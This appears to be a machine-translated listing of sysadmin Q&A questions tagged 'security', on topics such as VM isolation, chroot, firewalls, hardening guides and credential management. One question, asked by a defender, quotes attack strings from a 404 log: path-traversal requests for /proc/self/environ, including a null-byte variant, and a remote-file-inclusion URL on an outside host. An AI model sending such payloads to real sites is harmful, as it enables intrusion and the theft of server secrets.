Questions tagged «security»

问题： 如果某个虚拟机已损坏（被黑客入侵），那么我会对在同一物理计算机上运行的其他虚拟机承担什么风险？ 在同一物理主机上运行的虚拟机之间存在什么样的安全问题？ 有（您可以列出）这些（潜在）弱点和/或问题吗？ 警告： 我知道存在许多虚拟化类型/解决方案，并且可能存在不同的弱点。但是，我主要是在寻找有关虚拟化技术的一般安全问题，而不是特定的供应商错误。 请提供真实的事实，（认真的）研究，有经验的问题或技术说明。请明确点。不要（仅）发表您的意见。 例子： 两年前，我听说可能存在与MMU有关的安全性问题（我认为访问其他计算机的主内存），但是我不知道这是今天的实际威胁，还是只是理论研究学科。 编辑：我还发现，即使GnuPG在另一台 VM上运行，这种“刷新+重新加载”攻击也能够通过利用L3 CPU缓存来检索同一台物理计算机上的GnuPG秘密密钥。此后，已对GnuPG进行了修补。

12 security  virtualization  virtual-machines  hacking  hypervisor 

我已经使用CentOS盒了两年了。所以我对终端非常满意。但是，我读了很多博客文章，声称chroot是不安全的，并且这些文章的数量令人恐惧。真的是这样吗 为什么？ 我使用chroot在特定上下文中锁定仅SFTP用户，而根本没有任何外壳或命令。真的，那有什么安全问题？ 问题从StackOverflow被放逐。

12 linux  centos  security  chroot 

当我输入类似的内容时sudo apt-get install firefox，一切正常，直到询问我： After this operation, 77 MB of additional disk space will be used. Do you want to continue [Y/n]? Y 然后显示错误消息： Failed to fetch: <URL> 我的iptables规则如下： -P INPUT DROP -P OUTPUT DROP -P FORWARD DROP -A INPUT -i lo -j ACCEPT -A OUTPUT -o lo -j ACCEPT …

12 security  iptables  firewall 

关闭。这个问题是题外话。它当前不接受答案。 想改善这个问题吗？ 更新问题，以使其成为服务器故障的主题。 5年前关闭。 我们基础架构小组中的一些人希望升级以开始利用RHEL 6中的新功能。过去，我依靠《 NSA指南》（www.nsa.gov/ia/_files/os/redhat/rhel5-guide- i731.pdf）以保护RHEL 5和CentOS 5的安装。我发现该指南非常宝贵。 有没有人有过以类似方式保护RHEL / CentOS 6的经验？如果是这样，您利用了哪些资源（书面或咨询性）？ 我从一些同事那里听说，版本6在很多方面与版本5明显不同，所以我不想在安全性上留下空白，因为我没有充分考虑这些差异。 Red Hat自己的RHEL 6指南（http://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/Security_Guide/index.html）真的足够吗？ 有人会说，除非您有令人信服的功能原因，否则您应该推迟从5升级到6，直到NSA之类的组织可以针对您要保护的版本制定具体的指南？ 我感谢您可能收到的任何反馈，即使它会将我引导到一个更合适的论坛。 问候， 麦克风

12 security  documentation  rhel6 

在编写的Web应用程序中，以下内容的八进制格式的最佳最小权限是什么？ 用户上载静态文件（images / swf / js文件）的目录 管理员上载静态文件（images / swf / js文件）的目录 应用程序中使用的库所在的目录 可执行/可浏览服务器端脚本将驻留的目录 服务器端代码将在其中编辑现有文件（txt或xml）的目录 这是我的建议和理由 555，每个人都可以读写，没有人可以执行 544，所有者只能写，其他人只能读，没有人可以执行 000，没有人需要读取，写入或执行，只会被Web服务器使用吗？ 661，所有者可以读取，写入，其他所有人只能执行 600，所有者可以读写（可能不需要），没有其他人可以做任何事情 现在我对两件事感兴趣： 在第一个列表中我遗漏了一些基于Web的应用程序中常用的东西吗？ 您在第二个列表中有什么不同意的地方吗？您有什么选择？为什么它更好呢？

12 linux  permissions  web-applications  security 

我在一些有关pfSense的论坛上读过，说虚拟化pfSense很危险。所说的原因是攻击者可以使用pfsense作为对虚拟机管理程序进行攻击的跳板，然后使用它来访问其他虚拟机，并最终使所有内容脱机。 对我来说这听起来很疯狂，但是这个想法有没有切入现实？在虚拟服务器中运行路由器不是一个好主意吗？

12 virtualization  router  pfsense  security 

我们是一家相对较小的商店（就系统管理员数量而言），其中包含RHEL，Solaris，Windows 2003和Windows 2008服务器。总共约200台服务器。 对于我们的管理员帐户（root在Linux和admnistratorWindows中），我们有一个密码方案，该方案取决于数据中心位置和服务器的其他两个记录的属性。 在Linux上，我们目前的做法是创建一个共享的非特权帐户在那里我们可以su来root。在基于Windows的系统上，我们创建一个具有管理员特权的附加帐户。这两个帐户共享相同的密码。 事实证明这是非常低效的。当有人离开我们的商店时，我们必须： 更改管理员帐户的密码方案 为每台服务器生成一个新的管理员密码 提出新的非管理员帐户密码 触摸每台服务器并更改密码 我想知道在类似环境中是否有人可以建议一种更合理的方式来管理这些凭据。一些相关信息： 尽管我们的大多数服务器都属于AD域，但并非全部。 我们使用Puppet管理所有Linux服务器（我想到了密钥身份验证，但是只能解决上面提到的＃3问题）。 我们为Cobbler提供Linux服务器。 我们大约有10％的硬件专用于VMWare。在这些情况下，我们使用VMWare模板进行服务器构建。 任何想法或建议将不胜感激。这个问题已经存在了一段时间，我终于想解决它。

12 linux  windows-server-2008  security  active-directory  puppet 

我们目前正在处理但不存储信用卡数据。我们通过使用authorize.net API自行开发的应用程序对卡进行授权。 如果可能，我们希望将影响服务器的所有PCI要求（例如安装Anti-Virus）限制在一个隔离的单独环境中。在保持合规性的同时还能做到吗？ 如果是这样，那么将构成充分的隔离？如果不是，是否有明确定义该范围的地方？

12 security  pci-dss 

我试图在不触摸任何代码的情况下实现跨域HTTP访问控制。 我的Apache（2）服务器使用以下代码块返回了正确的访问控制标头： Header set Access-Control-Allow-Origin "*" Header set Access-Control-Allow-Methods "POST, GET, OPTIONS" 现在，我需要防止浏览器发送HTTP OPTIONS请求（REQUEST_METHOD返回存储在环境变量中）时Apache执行我的代码200 OK。 当请求方法为OPTIONS时，如何配置Apache响应“ 200 OK”？ 我已经尝试过此mod_rewrite块，但是访问控制标头丢失了。 RewriteEngine On RewriteCond %{REQUEST_METHOD} OPTIONS RewriteRule ^(.*)$ $1 [R=200,L]

12 apache-2.2  security  mod-rewrite  http 

浏览我的404日志时，我注意到以下两个URL，它们两个都发生一次： /library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 和 /library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 有问题的页面library.php需要一个type具有六个不同可接受值的id变量，然后是一个变量。因此，有效的网址可能是 library.php?type=Circle-K&id=Strange-Things-Are-Afoot 并且所有ID都必须mysql_real_escape_string先运行，然后才能用于查询数据库。 我是菜鸟，但在我看来，这两个链接都是针对Webroot的简单攻击？ 1）如何最好地防止404以外的其他事情？ 2）我应该永久禁止负责的IP吗？ 编辑：也只是注意到这一 /library.php=http://www.basfalt.no/scripts/danger.txt 编辑2：所有这3次攻击的违法IP都216.97.231.15追溯到位于洛杉矶外部的ISP，称为Lunar Pages。 编辑3：我决定在当地时间星期五早上致电ISP，并与可以与我打电话的人讨论这个问题。我将在24小时左右的时间内将结果发布在这里。 编辑4：我最终给他们的管理员发送了电子邮件，他们首先回答说“他们正在调查”，然后一天后回答“现在应该解决此问题”。遗憾的是，没有更多细节。

12 security  mysql  php  hacking 

我正在阅读MIT 6.893的演讲，该演讲说Unix中的保护是一团糟，没有任何底层原理，并且还指出Windows 具有更好的替代方案，可以通过IPC将特权从一个进程传递到另一个进程。 我认为，尽管Windows用户似乎更容易受到病毒和漏洞的攻击，但我认为这主要是由于大多数Windows用户经验不足的计算机用户，并且Windows平台拥有更多的用户，因此吸引了更多的攻击者。 我想知道是否有更详细的文章或论文比较Windows和Linux中的安全机制和设计？

12 linux  windows  security 

我正在考虑使用云服务来备份客户的网站之一。 我（客户）的主要担忧是（重要性从高到低） 保护IP（商业秘密，源代码），用户帐户详细信息等 服务提供商提供的正常运行时间保证（以最大程度地减少网络服务器的停机时间） 成本 上载/下载速度 理想情况下，我希望服务时间不长（例如，我希望使用一种“随用随付”服务） 我还想避免供应商锁定，因为在这种情况下几乎不可能转移到其他服务。 我想要一些有关以下方面的一般准则： 如何选择服务提供商 谁是该领域的主要参与者 推荐用于以下目的的软件：备份/还原/和上载/下载已保存/还原的文件 服务器软件要么是Ubuntu，要么是Debian（我可能会在服务器上选择要使用哪个操作系统的问题-我已经很熟悉Ubuntu）

12 ubuntu  security  backup  debian  cloud-storage 

在这里搜索先前的问题之后，人们普遍达成共识是，如果我拥有的一个实例被分配了10.208.34.55的私有IP，则只有我拥有的其他实例可以在该地址到达它。看到： 如何加密两个Amazon EC2实例之间的流量？ 那是对的吗？因此，我可以将我的所有实例都视为位于局域网上，并且对来自10.XXX.XXX.XXX的任何计算机进行身份验证和信任，因为我确定自己拥有它？ 我只想确定。我发现，亚马逊似乎比起提供明确的技术文档，更感兴趣的是为《云》及其3个字符的缩写加诗意。

12 networking  security  amazon-ec2  amazon-web-services 

我正在寻找通过互联网安全发送密码的最佳方法。我看过的选项是PGP和加密的RAR文件。除了从互联网上从点a到点b冒太多风险外，没有其他实际参数。

12 security  password 

我需要为客户检查CheckPoint防火墙的防火墙规则（具有200多个规则）。 过去，我曾使用FWDoc提取规则并将其转换为其他格式，但存在一些排除错误。然后，我手动分析它们以生成带有注释的规则的改进版本（通常在OOo Calc中）。 我知道有几种可视化技术，但是它们全都用于分析流量，因此我想进行静态分析。 所以我想知道，您遵循什么过程来分析防火墙规则？您使用什么工具（不仅用于Checkpoint）？

12 security  firewall  checkpoint